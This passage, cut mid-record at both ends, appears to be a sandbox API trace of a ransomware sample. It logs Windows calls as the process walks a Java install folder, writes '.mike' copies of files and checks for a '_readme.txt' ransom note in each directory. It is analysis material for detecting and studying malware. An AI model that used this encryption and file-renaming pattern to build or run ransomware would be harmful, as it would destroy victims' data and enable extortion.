nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 0 [0114.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0114.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0114.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x734f7d60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x734f7d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 1 [0114.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0114.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0114.421] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.421] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.421] CoTaskMemFree (pv=0x508980) [0114.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.422] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7", lpFilePart=0x0) returned 0x20 [0114.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0114.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0114.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7572f9a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7572f9a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lib", cAlternateFileName="")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.txt", cAlternateFileName="")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746d2260, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746d2260, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746d2260, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="release", cAlternateFileName="")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="THIRDPARTYLICENSEREADME-JAVAFX.txt", cAlternateFileName="THIRDP~1.TXT")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2b350, dwReserved0=0x0, dwReserved1=0x0, cFileName="THIRDPARTYLICENSEREADME.txt", cAlternateFileName="THIRDP~2.TXT")) returned 1 [0114.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0114.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0114.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0114.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0114.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0114.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0114.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0114.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0114.425] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", lpFilePart=0x0) returned 0x30 [0114.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0114.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0114.425] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\README.txt", lpFilePart=0x0) returned 0x2b [0114.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0114.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0114.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0114.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0114.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0114.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0114.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0114.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0114.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0114.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0114.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0114.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0114.431] WriteFile (in: hFile=0x288, lpBuffer=0x21305fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21305fc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0114.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", lpFilePart=0x0) returned 0x30 [0114.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0114.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0114.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\README.txt.mike", lpFilePart=0x0) returned 0x30 [0114.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0114.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0114.432] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt", dwFileAttributes=0x80) returned 1 [0114.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0114.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0114.433] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", lpFilePart=0x0) returned 0x2c [0114.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0114.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0114.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0114.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0114.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0114.435] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0114.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0114.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0114.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0114.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0114.436] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", lpFilePart=0x0) returned 0x48 [0114.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0114.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0114.436] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt", lpFilePart=0x0) returned 0x43 [0114.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0114.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0114.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0114.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0114.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0114.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0114.448] WriteFile (in: hFile=0x288, lpBuffer=0x21dcef4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21dcef4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0114.448] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", lpFilePart=0x0) returned 0x48 [0114.449] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.mike", lpFilePart=0x0) returned 0x48 [0114.449] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt", dwFileAttributes=0x80) returned 1 [0114.451] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", lpFilePart=0x0) returned 0x2c [0114.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0114.453] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", lpFilePart=0x0) returned 0x41 [0114.453] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt", lpFilePart=0x0) returned 0x3c [0114.471] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", lpFilePart=0x0) returned 0x41 [0114.472] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.mike", lpFilePart=0x0) returned 0x41 [0114.472] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt", dwFileAttributes=0x80) returned 1 [0114.474] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", lpFilePart=0x0) returned 0x2c [0114.476] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0114.476] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", lpFilePart=0x0) returned 0x32 [0114.476] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html", lpFilePart=0x0) returned 0x2d [0114.480] WriteFile (in: hFile=0x288, lpBuffer=0x22d9054*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22d9054*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0114.480] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", lpFilePart=0x0) returned 0x32 [0114.481] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.mike", lpFilePart=0x0) returned 0x32 [0114.481] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html", dwFileAttributes=0x80) returned 1 [0114.482] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\_readme.txt", lpFilePart=0x0) returned 0x2c [0114.483] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.483] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.484] CoTaskMemFree (pv=0x508980) [0114.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.484] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin", lpFilePart=0x0) returned 0x24 [0114.493] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.493] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.493] CoTaskMemFree (pv=0x508980) [0114.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.493] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client", lpFilePart=0x0) returned 0x2b [0114.495] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0114.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.mike", lpFilePart=0x0) returned 0x3b [0114.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt", lpFilePart=0x0) returned 0x36 [0114.500] WriteFile (in: hFile=0x288, lpBuffer=0x21c05c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21c05c8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0114.500] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.mike", lpFilePart=0x0) returned 0x3b [0114.500] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt", dwFileAttributes=0x80) returned 1 [0114.501] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\_readme.txt", lpFilePart=0x0) returned 0x37 [0114.503] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.503] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.503] CoTaskMemFree (pv=0x508980) [0114.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.504] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin", lpFilePart=0x0) returned 0x2d [0114.505] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.505] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.505] CoTaskMemFree (pv=0x508980) [0114.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.505] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2", lpFilePart=0x0) returned 0x2c [0114.507] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.507] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.507] CoTaskMemFree (pv=0x508980) [0114.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib", lpFilePart=0x0) returned 0x24 [0114.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, 